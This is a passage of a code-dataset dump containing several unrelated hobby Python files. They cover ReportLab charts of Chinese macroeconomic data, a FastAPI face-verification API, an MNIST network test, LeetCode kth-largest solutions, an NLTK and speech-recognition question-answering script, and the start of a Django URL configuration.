data_note=['GDP同比增长率','第一产业增长率','第二产业增长率','第三产业增长率'],\n timeAxis='quarter')\n\n renderPDF.draw(drawing=gdp_pull_drawing, canvas=c, x=10, y=letter[1] * 0.6)\n\n c.showPage()\n\n return c\n\n\ndef addDemandsForGDPPage(canvas_para):\n\n \"\"\"\n 函数功能:三大需求对GDP的贡献\n :param canvas_para:\n :return:\n \"\"\"\n\n c = canvas_para\n\n gdp_for = ts.get_gdp_for()\n\n end_for = ExtractPointFromDf_DateX(df_origin=gdp_for, date_col='year', y_col='end_for', timeAxis='year')\n asset_for = ExtractPointFromDf_DateX(df_origin=gdp_for, date_col='year', y_col='asset_for', timeAxis='year')\n goods_for = ExtractPointFromDf_DateX(df_origin=gdp_for, date_col='year', y_col='goods_for', timeAxis='year')\n\n\n gdp_for_drawing = genLPDrawing([tuple(end_for), tuple(asset_for), tuple(goods_for)], ['最终消费支出贡献率', '资本形成总额贡献率', '货物和服务净出口贡献率'], timeAxis='year')\n\n renderPDF.draw(drawing=gdp_for_drawing, canvas=c, x=10, y=letter[1] * 0.6)\n\n for_rate = ExtractPointFromDf_DateX(df_origin=gdp_for, date_col='year', y_col='for_rate', timeAxis='year')\n asset_rate = ExtractPointFromDf_DateX(df_origin=gdp_for, date_col='year', y_col='asset_rate', timeAxis='year')\n goods_rate = ExtractPointFromDf_DateX(df_origin=gdp_for, date_col='year', y_col='goods_rate', timeAxis='year')\n\n\n gdp_for_drawing = genLPDrawing([tuple(for_rate), tuple(asset_rate), tuple(goods_rate)], ['最终消费支出拉动(百分点)', '资本形成总额拉动(百分点)', '货物和服务净出口拉动(百分点)'], timeAxis='year')\n\n renderPDF.draw(drawing=gdp_for_drawing, canvas=c, x=10, y=letter[1] * 0.2)\n\n c.showPage()\n\n return c\n\n\ndef addGDPPullPage(canvas_para):\n\n \"\"\"\n 函数功能:展示三个产业对GDP的拉动情况\n :param canvas_para:\n :return:\n \"\"\"\n\n c = canvas_para\n\n gdp_pull = ts.get_gdp_pull()\n\n gdp_yoy = ExtractPointFromDf_DateX(df_origin=gdp_pull, date_col='year', y_col='gdp_yoy', timeAxis='year')\n pi = ExtractPointFromDf_DateX(df_origin=gdp_pull, date_col='year', y_col='pi', timeAxis='year')\n si = ExtractPointFromDf_DateX(df_origin=gdp_pull, date_col='year', y_col='si', timeAxis='year')\n industry = ExtractPointFromDf_DateX(df_origin=gdp_pull, date_col='year', y_col='industry', timeAxis='year')\n ti = ExtractPointFromDf_DateX(df_origin=gdp_pull, date_col='year', y_col='ti', timeAxis='year')\n\n\n gdp_pull_drawing = genLPDrawing([tuple(gdp_yoy),tuple(pi),tuple(si),tuple(industry),tuple(ti)],\n data_note=['GDP同比增长率','第一产业拉动率','第二产业拉动率','工业拉动率','第三产业拉动率'],\n timeAxis='year')\n\n renderPDF.draw(drawing=gdp_pull_drawing, canvas=c, x=10, y=letter[1] * 0.6)\n\n c.showPage()\n\n return c\n\n\ndef addCPIPage(canvas_para, length):\n \"\"\"\n 函数功能:增加CPI页\n :param canvas_para:\n :return:\n \"\"\"\n\n c = canvas_para\n\n cpi_df = ts.get_cpi()\n cpi_df['month'] = cpi_df.apply(lambda x:stdMonthDate(x['month']), axis=1)\n cpi_df = cpi_df.sort_values(by='month',ascending=False).head(length).sort_values(by='month',ascending=True)\n\n cpi = ExtractPointFromDf_DateX(df_origin=cpi_df, date_col='month', y_col='cpi', timeAxis='month')\n\n\n gdp_pull_drawing = genLPDrawing([tuple(cpi)],\n data_note=['CPI增长率'],\n timeAxis='month')\n\n renderPDF.draw(drawing=gdp_pull_drawing, canvas=c, x=10, y=letter[1] * 0.6)\n\n c.showPage()\n\n return c\n\n\ndef addPPIPage(canvas_para, length):\n \"\"\"\n 函数功能:工业品出厂价格指数\n :param canvas_para:\n :return:\n \"\"\"\n\n c = canvas_para\n\n ppi_df = ts.get_ppi()\n ppi_df['month'] = ppi_df.apply(lambda x:stdMonthDate(x['month']), axis=1)\n ppi_df = ppi_df.sort_values(by='month',ascending=False).head(length).sort_values(by='month',ascending=True)\n\n ppiip = ExtractPointFromDf_DateX(df_origin=ppi_df, 
date_col='month', y_col='ppiip', timeAxis='month')\n ppi = ExtractPointFromDf_DateX(df_origin=ppi_df, date_col='month', y_col='ppi', timeAxis='month')\n qm = ExtractPointFromDf_DateX(df_origin=ppi_df, date_col='month', y_col='qm', timeAxis='month')\n rmi = ExtractPointFromDf_DateX(df_origin=ppi_df, date_col='month', y_col='rmi', timeAxis='month')\n pi = ExtractPointFromDf_DateX(df_origin=ppi_df, date_col='month', y_col='pi', timeAxis='month')\n\n\n ppi_industry_drawing = genLPDrawing([tuple(ppiip), tuple(ppi), tuple(qm), tuple(rmi), tuple(pi)],\n data_note=['工业品出厂价格指数',\n '生产资料价格指数',\n '采掘工业价格指数',\n '原材料工业价格指数',\n '加工工业价格指数'],\n timeAxis='month')\n\n renderPDF.draw(drawing=ppi_industry_drawing, canvas=c, x=10, y=letter[1] * 0.6)\n\n cg = ExtractPointFromDf_DateX(df_origin=ppi_df, date_col='month', y_col='cg', timeAxis='month')\n food = ExtractPointFromDf_DateX(df_origin=ppi_df, date_col='month', y_col='food', timeAxis='month')\n clothing = ExtractPointFromDf_DateX(df_origin=ppi_df, date_col='month', y_col='clothing', timeAxis='month')\n roeu = ExtractPointFromDf_DateX(df_origin=ppi_df, date_col='month', y_col='roeu', timeAxis='month')\n dcg = ExtractPointFromDf_DateX(df_origin=ppi_df, date_col='month', y_col='dcg', timeAxis='month')\n\n\n ppi_life_drawing = genLPDrawing([tuple(cg), tuple(food), tuple(clothing), tuple(roeu), tuple(dcg)],\n data_note=['生活资料价格指数',\n '食品类价格指数',\n '衣着类价格指数',\n '一般日用品价格指数',\n '耐用消费品价格指数'],\n timeAxis='month')\n\n renderPDF.draw(drawing=ppi_life_drawing, canvas=c, x=10, y=letter[1] * 0.2)\n\n c.showPage()\n\n return c\n\n\ndef addShiborPage(canvas_para,year_start='2006',year_end=str(datetime.datetime.now().year + 1)):\n \"\"\"\n 函数功能:增加银行间拆借利率页\n :param canvas_para:\n :return:\n \"\"\"\n c = canvas_para\n\n date_list = pd.date_range(start=year_start, end=year_end, freq='12M')\n year_list = [str(x)[0:4] for x in date_list]\n\n df_shibor_list = []\n for year in year_list:\n shibor_this = ts.shibor_data(year)\n df_shibor_list.append(shibor_this)\n\n df_shibor = pd.concat(df_shibor_list,axis=0).sort_values(by='date', ascending=True)\n\n ON = ExtractPointFromDf_DateX(df_origin=df_shibor,date_col='date',y_col='ON',timeAxis='datetime')\n W1 = ExtractPointFromDf_DateX(df_origin=df_shibor, date_col='date', y_col='1W',timeAxis='datetime')\n W2 = ExtractPointFromDf_DateX(df_origin=df_shibor, date_col='date', y_col='2W',timeAxis='datetime')\n M1 = ExtractPointFromDf_DateX(df_origin=df_shibor, date_col='date', y_col='1M',timeAxis='datetime')\n M3 = ExtractPointFromDf_DateX(df_origin=df_shibor, date_col='date', y_col='3M',timeAxis='datetime')\n M6 = ExtractPointFromDf_DateX(df_origin=df_shibor, date_col='date', y_col='6M',timeAxis='datetime')\n M9 = ExtractPointFromDf_DateX(df_origin=df_shibor, date_col='date', y_col='9M',timeAxis='datetime')\n Y1 = ExtractPointFromDf_DateX(df_origin=df_shibor, date_col='date', y_col='1Y',timeAxis='datetime')\n\n shibor_drawing = genLPDrawing([tuple(ON)],data_note=['隔夜拆放利率'],timeAxis='day',height=letter[1]*0.1)\n renderPDF.draw(drawing=shibor_drawing, canvas=c, x=10, y=letter[1] * 0.85)\n\n shibor_drawing = genLPDrawing([tuple(W1)],data_note=['1周拆放利率'],timeAxis='day',height=letter[1]*0.1)\n renderPDF.draw(drawing=shibor_drawing, canvas=c, x=10, y=letter[1] * 0.7)\n\n shibor_drawing = genLPDrawing([tuple(W2)],data_note=['2周拆放利率'],timeAxis='day',height=letter[1]*0.1)\n renderPDF.draw(drawing=shibor_drawing, canvas=c, x=10, y=letter[1] * 0.55)\n\n shibor_drawing = 
genLPDrawing([tuple(M1)],data_note=['1月拆放利率'],timeAxis='day',height=letter[1]*0.1)\n renderPDF.draw(drawing=shibor_drawing, canvas=c, x=10, y=letter[1] * 0.4)\n\n shibor_drawing = genLPDrawing([tuple(M3),\n tuple(M6),\n tuple(M9),\n tuple(Y1)],\n\n data_note=['3月拆放利率',\n '6月拆放利率',\n '9月拆放利率',\n '1年拆放利率'],\n\n timeAxis='day',height=letter[1]*0.25)\n\n renderPDF.draw(drawing=shibor_drawing, canvas=c, x=10, y=letter[1] * 0.1)\n\n c.showPage()\n return c\n\n\ndef addLprPage(canvas_para,year_start='2013',year_end=str(datetime.datetime.now().year + 1)):\n \"\"\"\n 函数功能:增加贷款利率页\n :param canvas_para:\n :return:\n \"\"\"\n c = canvas_para\n\n date_list = pd.date_range(start=year_start, end=year_end, freq='12M')\n year_list = [str(x)[0:4] for x in date_list]\n\n df_Lpr_list = []\n for year in year_list:\n lpr_this = ts.lpr_data(year)\n df_Lpr_list.append(lpr_this)\n\n df_Lpr = pd.concat(df_Lpr_list, axis=0).sort_values(by='date', ascending=True).drop_duplicates(subset='1Y',keep='first')\n\n Y1 = ExtractPointFromDf_DateX(df_origin=df_Lpr, date_col='date', y_col='1Y', timeAxis='datetime')\n lpr_drawing = genLPDrawing([tuple(Y1)], data_note=['1年贷款基础利率'], timeAxis='day', height=letter[1] * 0.3, y_min_zero=True)\n renderPDF.draw(drawing=lpr_drawing, canvas=c, x=10, y=letter[1] * 0.6)\n\n # 画均值贷款利率\n # df_Lpr_ma_list = []\n # for year in year_list:\n # lpr_ma_this = ts.lpr_ma_data(year)\n # df_Lpr_ma_list.append(lpr_ma_this)\n #\n # df_Lpr_ma = pd.concat(df_Lpr_ma_list, axis=0).sort_values(by='date', ascending=True)\\\n # .drop_duplicates(subset=['1Y_5', '1Y_10', '1Y_20'], keep='first')\\\n # .apply(lambda x:x.replace('---',nan), axis=1)\n #\n # Y1_5 = ExtractPointFromDf_DateX(df_origin=df_Lpr_ma, date_col='date', y_col='1Y_5', timeAxis='datetime')\n # Y1_10 = ExtractPointFromDf_DateX(df_origin=df_Lpr_ma, date_col='date', y_col='1Y_10', timeAxis='datetime')\n # Y1_20 = ExtractPointFromDf_DateX(df_origin=df_Lpr_ma, date_col='date', y_col='1Y_20', timeAxis='datetime')\n #\n # lpr_ma_drawing = genLPDrawing([tuple(Y1_5),tuple(Y1_10),tuple(Y1_20)],\n # data_note=['1年贷款基础利率-M5','1年贷款基础利率-M10','1年贷款基础利率-M20'],\n # timeAxis='day',\n # height=letter[1] * 0.3)\n #\n # renderPDF.draw(drawing=lpr_ma_drawing, canvas=c, x=10, y=letter[1] * 0.2)\n\n\n c.showPage()\n return c\n\n\ndef addTailPage(canvas_param, pagesize=letter):\n \"\"\"\n 函数功能:为pdf文档添加功能,分“主题”、“副标题”两部分\n :param canvas:\n :param pagesize: 页面大小,默认A4\n :param theme: 主题字符串\n :param subtitle: 副标题字符串\n :return:\n \"\"\"\n PAGE_WIDTH = pagesize[0]\n PAGE_HEIGHT = pagesize[1]\n\n # 设置主标题字体并打印主标题\n canvas_param.setFont(\"song\", 30)\n canvas_param.drawString(20, PAGE_HEIGHT*0.7, '加群:StockReport 825832838')\n\n canvas_param.drawString(20, PAGE_HEIGHT * 0.65, '每日免费获取该文档!')\n\n canvas_param.showPage()\n\n return canvas_param","repo_name":"dxcv/My_Quant","sub_path":"Auto_Report/ReportLab/SubFunction.py","file_name":"SubFunction.py","file_ext":"py","file_size_in_byte":32173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"18861051015","text":"\n\nfrom fastapi import (\n APIRouter,\n UploadFile,\n HTTPException,\n File\n)\nimport socketio\nfrom service.verification import Verification\nfrom datetime import datetime\nfrom domain.model.payload import VerifySessionPayload\n\nverification_api = APIRouter(\n prefix=\"/verification\"\n)\nVerification = Verification()\n\nsio = socketio.AsyncServer(async_mode=\"asgi\")\nsocket_app = socketio.ASGIApp(sio)\n\n@sio.event\ndef connect(sid, environ, auth):\n 
print('connect ', sid)\n\n@verification_api.get(\"/generate\")\nasync def generate_session():\n \"\"\"\n Generate Session Token.\n\n This will generate a TTL token and store it in the\n\n in-memory database:\n\n * Generate the token.\n * Store the token in Redis.\n \"\"\"\n\n session_token = Verification.gennerate_session_code()\n\n return {\n \"issure_at\": datetime.now(),\n \"session_token\": session_token,\n \"expire_at\": int(datetime.timestamp(datetime.utcnow()) * 1000)\n }\n\n\n@verification_api.post(\"/verify-session\")\nasync def verify_session(data: VerifySessionPayload):\n \"\"\"\n Verify Session Token.\n\n This will verify that the token exists in the\n\n in-memory database:\n\n * Verify the token.\n \"\"\"\n token = data.session_token\n session = Verification.verify_session_code(session_code=token)\n \n if not session:\n return {\n \"status\": \"Invalid or Expired token\",\n }\n else:\n return {\n \"status\": \"Verified\",\n }\n sio.emit(f'{token}',\"Verify complete\")\n\n\n@verification_api.post(\"/verify-exist\")\nasync def verify_exist(\n file: UploadFile=File(...),\n):\n \"\"\"\n Verify whether the face data exists in the DB.\n\n in-memory database:\n\n * Receive the face image and convert it to an embedding vector.\n * Check whether the face data exists in the DB.\n \"\"\"\n \n if not file :\n raise HTTPException(status_code=400, detail=\"No file submitted\")\n else:\n query = await file.read()\n res = Verification.face_recognition(query_face=query)\n return res\n \n\n\n@verification_api.post(\"/register-face\")\nasync def register_face(\n file: UploadFile=File(...),\n):\n \"\"\"\n Register new face data in the DB.\n\n in-memory database:\n\n * Receive the face image and convert it to an embedding vector.\n * Register the face data in the DB.\n \"\"\"\n \n if not file :\n raise HTTPException(status_code=400, detail=\"No file submitted\")\n else:\n query = await file.read()\n try:\n Verification.register_face(query)\n return {\n \"message\":\"face registered\"\n }\n except:\n raise HTTPException(status_code=503, detail=\"Error registering face\")\n","repo_name":"pattanunNP/KlarityBackend","sub_path":"controller/verification_controller.py","file_name":"verification_controller.py","file_ext":"py","file_size_in_byte":2631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"70447131241","text":"import sys\nimport os\nsys.path.insert(1, os.path.join(sys.path[0], '..'))\n\nimport time\n\nimport data_loader\nfrom network import FullyConnectedFeedforwardNetwork\nfrom network import SimpleFeedforwardNetwork\nimport numpy as np\nimport pickle\n\n\ndef compare_result(predicted, expected):\n predicted_idx = np.argmax(predicted)\n expected_idx = np.argmax(expected)\n #print(\"validating testcase: expected %d, got %d\" % (expected_idx, predicted_idx))\n return predicted_idx == expected_idx\n\ndef validate_network(network, validation_data, max_data_count=None):\n \"\"\"\n Validate the network on at most max_data_count samples and\n return the failure rate.\n \"\"\"\n failure_count = 0\n total_count = 0\n for (vi, vo) in validation_data:\n total_count += 1\n predicted_output = network.GetOutput(vi)\n if (not compare_result(predicted_output, vo)):\n failure_count += 1\n if ((max_data_count is not None) and (total_count > max_data_count)):\n break\n\n result = failure_count / total_count\n return result\n\n\n\nif (__name__ == \"__main__\"):\n layer_sizes = [28*28, 30, 10]\n rho = 0.5 \n batch_size = 10\n max_epoch = 10\n\n use_simple_network = False\n if (len(sys.argv) > 2):\n raise RuntimeError(\"Do not know how to handle the command-line arguments:\\n{}\".format(sys.argv))\n 
elif (len(sys.argv) > 1):\n use_simple_network = (sys.argv[1] == \"simple\")\n\n if (use_simple_network):\n print(\"testing simple feedforward network\")\n n = SimpleFeedforwardNetwork(layer_sizes)\n else:\n print(\"testing fully connected feedforward network\")\n n = FullyConnectedFeedforwardNetwork(layer_sizes, \"sigmoid\")\n\n # load dataset\n training_data, validation_data, test_data = \\\n data_loader.load_mnist_dataset()\n\n # training\n for iter in range(max_epoch):\n start_time = time.time()\n actual_rho = rho / (iter + 1)\n np.random.shuffle(training_data)\n for k in range(batch_size, len(training_data), batch_size):\n #if (k > 10000):\n # break\n batch = training_data[k-batch_size:k]\n n.Train(batch, rho)\n # run validation data\n error_rate = validate_network(n, validation_data, 100)\n end_time = time.time()\n print(\"epoch %d: %.2fs, error rate %.2f%%\" % (iter, end_time - start_time, 100 * error_rate))\n pickle.dump(n, open(\"network.pkl\", \"wb\"))\n\n","repo_name":"lonelycorn/machine-learning","sub_path":"legacy/test/test_feedforward_network.py","file_name":"test_feedforward_network.py","file_ext":"py","file_size_in_byte":2410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"9466685928","text":"\n\"\"\"\n1985. Find the Kth Largest Integer in the Array\n\nYou are given an array of strings nums and an integer k. Each string in nums represents \nan integer without leading zeros.\n\nReturn the string that represents the kth largest integer in nums.\n\nNote: Duplicate numbers should be counted distinctly. For example, if nums is [\"1\",\"2\",\"2\"], \n\"2\" is the first largest integer, \"2\" is the second-largest integer, and \"1\" is the third-largest integer.\nExample 1:\n\nInput: nums = [\"3\",\"6\",\"7\",\"10\"], k = 4\nOutput: \"3\"\nExplanation:\nThe numbers in nums sorted in non-decreasing order are [\"3\",\"6\",\"7\",\"10\"].\nThe 4th largest integer in nums is \"3\".\nExample 2:\n\nInput: nums = [\"2\",\"21\",\"12\",\"1\"], k = 3\nOutput: \"2\"\nExplanation:\nThe numbers in nums sorted in non-decreasing order are [\"1\",\"2\",\"12\",\"21\"].\nThe 3rd largest integer in nums is \"2\".\n\"\"\"\n\n# Approach 1: Sorting\n# Time complexity: O(nlogn)\n# Space complexity: O(1)\ndef kthLargestNumber(self, nums, k):\n for i, num in enumerate(nums):\n nums[i] = int(num)\n nums.sort(reverse = True)\n return str(nums[k-1])\n\n# Approach 2: Using a maxheap\n# Time complexity: O(klogn)\n# Space complexity: O(n)\nimport heapq\ndef findKthLargest(self, nums, k):\n heap = []\n\n for i in range(len(nums)):\n heap.append(-1*int(nums[i]))\n heapq.heapify(heap)\n while k > 0:\n K_largest = -1*(heapq.heappop(heap))\n k -= 1\n return str(K_largest)\n\n# Approach 3: Using Quick select\n# Time complexity: O(n) in the best case, worst case is O(n^2)\n# Space complexity: O(1)\nclass Solution(object):\n def findKthLargest(self, nums, k):\n return self.qs(nums, 0, len(nums)-1, k)\n \n def qs(self, arr, l, r, k):\n p = self.partition(arr, l, r)\n if (k-1) == p:\n return arr[p]\n elif (k-1) > p:\n return self.qs(arr, p + 1, r, k)\n else:\n return self.qs(arr, l, p - 1, k)\n\n def partition(self, arr, l, r):\n pivot = arr[r]\n i = l\n for j in range(l, r):\n if int(arr[j]) > int(pivot):\n arr[i], arr[j] = arr[j], arr[i]\n i += 1\n arr[i], arr[r] = arr[r], arr[i]\n return i\n\n","repo_name":"yonahgraphics/Grokking-Leetcode-Patterns","sub_path":"heaps/Find the Kth Largest Integer in the Array.py","file_name":"Find the Kth Largest Integer in 
the Array.py","file_ext":"py","file_size_in_byte":2169,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"18"} +{"seq_id":"73569290599","text":"#from nltk import RegexpParser\r\n#from nltk import tokenize\r\n#from nltk.tree import *\r\n#from tempfile import TemporaryFile\r\nimport nltk\r\n#import os\r\nimport csv\r\nimport pandas as pd\r\n#import itertools\r\nfrom nltk.stem import WordNetLemmatizer\r\nfrom nltk.corpus import stopwords\r\n#from nltk.tokenize import word_tokenize\r\n#from nltk import word_tokenize, pos_tag, ne_chunk\r\n#import numpy as np\r\n#import math\r\n\r\n#Python 2.x program for Speech Recognition\r\n \r\nimport speech_recognition as sr\r\n \r\n#enter the name of usb microphone that you found\r\n#using lsusb\r\n#the following name is only used as an example\r\nmic_name = \"Microphone (High Definition Aud\"\r\n#Sample rate is how often values are recorded\r\nsample_rate = 48000\r\n#Chunk is like a buffer. It stores 2048 samples (bytes of data)\r\n#here. \r\n#it is advisable to use powers of 2 such as 1024 or 2048\r\nchunk_size = 2048\r\n#Initialize the recognizer\r\nr = sr.Recognizer()\r\n \r\n#generate a list of all audio cards/microphones\r\nmic_list = sr.Microphone.list_microphone_names()\r\n \r\n#the following loop aims to set the device ID of the mic that\r\n#we specifically want to use to avoid ambiguity.\r\nfor i, microphone_name in enumerate(mic_list):\r\n if microphone_name ==mic_list[2]:\r\n device_id = 2\r\n \r\n#use the microphone as source for input. Here, we also specify \r\n#which device ID to specifically look for incase the microphone \r\n#is not working, an error will pop up saying \"device_id undefined\"\r\nwith sr.Microphone(device_index = device_id, sample_rate = sample_rate,chunk_size = chunk_size) as source:\r\n #wait for a second to let the recognizer adjust the \r\n #energy threshold based on the surrounding noise level\r\n r.adjust_for_ambient_noise(source)\r\n print (\"Say Something\")\r\n #listens for the user's input\r\n audio = r.listen(source)\r\n \r\n try:\r\n text = r.recognize_google(audio)\r\n print (\"you said:\" + text)\r\n \r\n #error occurs when google could not understand what was said\r\n \r\n except sr.UnknownValueError:\r\n print(\"Google Speech Recognition could not understand audio\")\r\n \r\n except sr.RequestError as e:\r\n print(\"Could not request results from Google Speech Recognition service; {0}\".format(e))\r\n\r\n\r\n\r\n\r\ndef one():\r\n \r\n stop_words = set(stopwords.words('english'))\r\n sent_text = nltk.sent_tokenize(text)\r\n file = open('Text_Without_Stopwords.txt','w') \r\n for sentence in sent_text:\r\n tokenized_text = nltk.word_tokenize(sentence)\r\n filtered_sentence = [w for w in tokenized_text if not w in stop_words]\r\n filtered_sentence = []\r\n temp=\"\"\r\n \r\n for w in tokenized_text:\r\n if w not in stop_words:\r\n filtered_sentence.append(w)\r\n temp = temp + w +\" \"\r\n\r\n #print(temp)\r\n file.write(temp)\r\n file.close()\r\n \r\n \r\n \r\ndef two():\r\n file = open('Text_Without_Stopwords.txt','r') \r\n text = file.read()\r\n file.close()\r\n lemmatizer = WordNetLemmatizer()\r\n\r\n stop_words = set(stopwords.words('english'))\r\n sent_text = nltk.sent_tokenize(text)\r\n file = open('Text_Lemmatized.txt','w') \r\n for sentence in sent_text:\r\n tokenized_text = nltk.word_tokenize(sentence)\r\n filtered_sentence = [w for w in tokenized_text if not w in stop_words]\r\n #filtered_sentence = []\r\n temp=\"\"\r\n tokenized_text = 
nltk.word_tokenize(sentence)\r\n for w in tokenized_text:\r\n #filtered_sentence.append(w)\r\n temp = temp + lemmatizer.lemmatize(w) +\" \"\r\n file.write(temp)\r\n file.close()\r\n \r\n\r\ndef three():\r\n file = open('Text_Lemmatized.txt','r') \r\n text = file.read()\r\n file.close()\r\n word_list = text.split()\r\n word_list = [word.replace(\".\", \"\") for word in word_list]\r\n word_list = [word.replace(\",\", \"\") for word in word_list]\r\n file = open ('Text_Unique_Words.txt', 'w')\r\n #print(word_list)\r\n unique_words = set(word_list)\r\n #print(unique_words)\r\n for word in unique_words:\r\n file.write(str(word)+\" \")\r\n file.close()\r\n \r\n \r\ndef four():\r\n file = open('Text_Unique_Words.txt','r') \r\n text = file.read()\r\n file.close()\r\n wordlist = text.split()\r\n file = open('Text_to_Vector.txt','w') \r\n \r\n file1 = open('Text_Lemmatized.txt','r') \r\n text = file1.read()\r\n file1.close()\r\n sent_text = nltk.sent_tokenize(text)\r\n file.write(str(wordlist) + '\\n')\r\n for sentence in sent_text:\r\n tokenized_text = nltk.word_tokenize(sentence)\r\n wordfreq = []\r\n for w in wordlist:\r\n wordfreq.append(sentence.count(w))\r\n\r\n file.write(str(wordfreq) + '\\n')\r\n file.close()\r\n\r\n # Read in the file\r\n with open('Text_to_Vector.txt', 'r') as file :\r\n filedata = file.read()\r\n file.close()\r\n \r\n # Replace the target string\r\n filedata = filedata.replace('[', '')\r\n filedata = filedata.replace(']', '')\r\n \r\n # Write the file out again\r\n with open('Text_to_Vector.txt', 'w') as file:\r\n file.write(filedata)\r\n file.close()\r\n\r\n\r\ndef five():\r\n with open('Text_to_Vector.txt', 'r') as in_file:\r\n stripped = (line.strip() for line in in_file)\r\n\r\n lines = (line.split(\",\") for line in stripped if line)\r\n with open('WordVectortest.csv', 'w') as out_file:\r\n writer = csv.writer(out_file)\r\n #writer.writerow(('title', 'intro'))\r\n writer.writerows(lines)\r\n \r\none()\r\ntwo()\r\nthree()\r\nfour()\r\nfive()\r\n \r\n\r\ntestset = pd.read_csv('WordVectortest.csv')\r\ntestsetval = list(testset)\r\n#print(testsetval)\r\n\r\nfor i in range(len(testsetval)):\r\n testsetval[i] = testsetval[i].lower()\r\n if ' ' in testsetval[i]:\r\n testsetval[i] = testsetval[i].replace(' ','')\r\n \r\n\r\n\r\ndataset = pd.read_csv('WordVector.csv')\r\ndatasetval = list(dataset)\r\n#print(datasetval)\r\n\r\n\r\nfor i in range(len(datasetval)):\r\n datasetval[i] = datasetval[i].lower()\r\n if ' ' in datasetval[i]:\r\n datasetval[i] = datasetval[i].replace(' ','')\r\n \r\n \r\n \r\n \r\n\r\ncount = []\r\nfor k in range(len(dataset)):\r\n myset = dataset.iloc[k]\r\n c = 0\r\n for i in range(len(testsetval)):\r\n if myset[datasetval.index(testsetval[i])]==1:\r\n c = c + 1\r\n count.append(c)\r\n \r\n\r\n#print(count.index(max(count)))\r\n\r\n\r\nmyfile = open('passage.txt','r')\r\n\r\ndata = myfile.read()\r\n\r\nmydata = data.split('.')\r\nans=mydata[count.index(max(count))]\r\n\r\nmyfile.close()\r\nprint(ans)\r\nfrom gtts import gTTS\r\ntts = gTTS(text=ans, lang='en')\r\ntts.save('ans2.mp3')\r\nimport pygame\r\npygame.init()\r\npygame.mixer.music.load(\"ans2.mp3\")\r\npygame.mixer.music.play()\r\n'''from playsound import playsound\r\nplaysound('ans2.mp3')'''","repo_name":"bhanu-prakash3/Question-Answering-System","sub_path":"new.py","file_name":"new.py","file_ext":"py","file_size_in_byte":6696,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"828436883","text":"#descripcion: programa donde se le 
asks the user for a number and prints the divisors of that number\n#input: ask the user for a number\n#output: the divisors of the number given by the user\n#author: mvillalobos\n#date: 12/07/2017\n#version:2.0\n#platform: python v2.7\n\nx = int(input(\"enter a number:\"))\nfor i in range(1,x + 1):\n    if x%i==0:\n        print(i)\n","repo_name":"mvillalobos712/ejercicios_python","sub_path":"ejercicios_python5.1.py","file_name":"ejercicios_python5.1.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"19702006885","text":"from matplotlib import *\nfrom numpy import *\nfrom scipy import *\nfrom pandas import *\n\nmainMenuPrint: str = \"Main Menu: \\n[1] New Data \\n[2] Open Data \\n[3] Save Data \\n[4] View Data \\n[5] Edit Data \\n[6]\" \\\n                     \" Show Save File Path \\n[7] Check Concordant Results \\n[8] Average Data\\n[9] Plot Graph\"\nfirstStart: bool = True\nanyData: bool = False\ndataSaved: bool = False\nyesNo = ''\nseeData = ''\nDataFile: str = ''\n\ndef firstTime():\n    global firstStart\n    while firstStart == True:\n        print('Welcome to SciLabs, this is an interface to help with data analysis for sciences \\nPlease remember to enter the value shown in the [], but without the surrounding []')\n        firstStart = False\n\ndef saveYesNo():\n    global yesNo\n    while yesNo not in ('Y', 'N'):\n        yesNo = input('Do you want to save: \\n[Y]es \\n[N]o:\\n')\n        if yesNo == 'Y':\n            saveData()\n            break\n        elif yesNo == 'N':\n            pass\n            break\n        else:\n            errorOut(1)\n\ndef openData():\n    global seeData\n    global dataSaved\n    global path\n    global DataFile\n    if dataSaved == False:\n        print('Current Data is not saved')\n        saveYesNo()\n    else:\n        pass\n    path = str(input('Enter file path \\nShould be a .txt file in current directory where this program is running from:\\n'))\n    DataFile = open(path, 'r+')\n\n    while seeData not in ('Y', 'N'):\n        seeData = str(input('Do you want to see your data: \\n[Y]es \\n[N]o: \\n'))\n        if seeData == 'Y':\n            viewData()\n        elif seeData == 'N':\n            pass\n        else:\n            errorOut(1)\n\n\ndef errorOut(state):\n    print('There has been an error:')\n    if state == 1:\n        print('Input not recognised, please try again\\n')\n    elif state == 2:\n        print('No data present, please create data\\n')\n    else:\n        print('Big problem: Error not known!\\n')\n\n\ndef mainMenu():\n    firstTime()\n\n    print(mainMenuPrint)\n    menuInput: int = int(input('Enter option:'))\n\n    if menuInput == 2:\n        openData()\n    elif menuInput == 3:\n        saveData()\n    elif menuInput == 4:\n        viewData()\n    elif menuInput == 5:\n        editData()\n    elif menuInput == 6:\n        fileLoc()\n    elif menuInput == 7:\n        checkConcord()\n    elif menuInput == 8:\n        averageData()\n    elif menuInput == 9:\n        plotGraph()\n    elif menuInput == 1:\n        newData()\n    else:\n        errorOut(1)\n\n\nwhile True:\n    mainMenu()\n","repo_name":"thomasholland123/SDAK","sub_path":"sdak.py","file_name":"sdak.py","file_ext":"py","file_size_in_byte":2476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"74893744998","text":"from django.conf.urls import url\nfrom kompany import views\n\nurlpatterns = [\n    url(r'^$', views.home_page, name='home'),\n    url(r'^search/$', views.search, name='search'),\n    url(r'^product/(?P[-\\w]+)/$', views.product_page, name='product_page'),\n    url(r'^(?P[a-z]+)/(?P[-\\w]+)/$', views.category_view, name='product_list'),\n    url(r'^(?P[-\\w]+)/$', views.category_view,
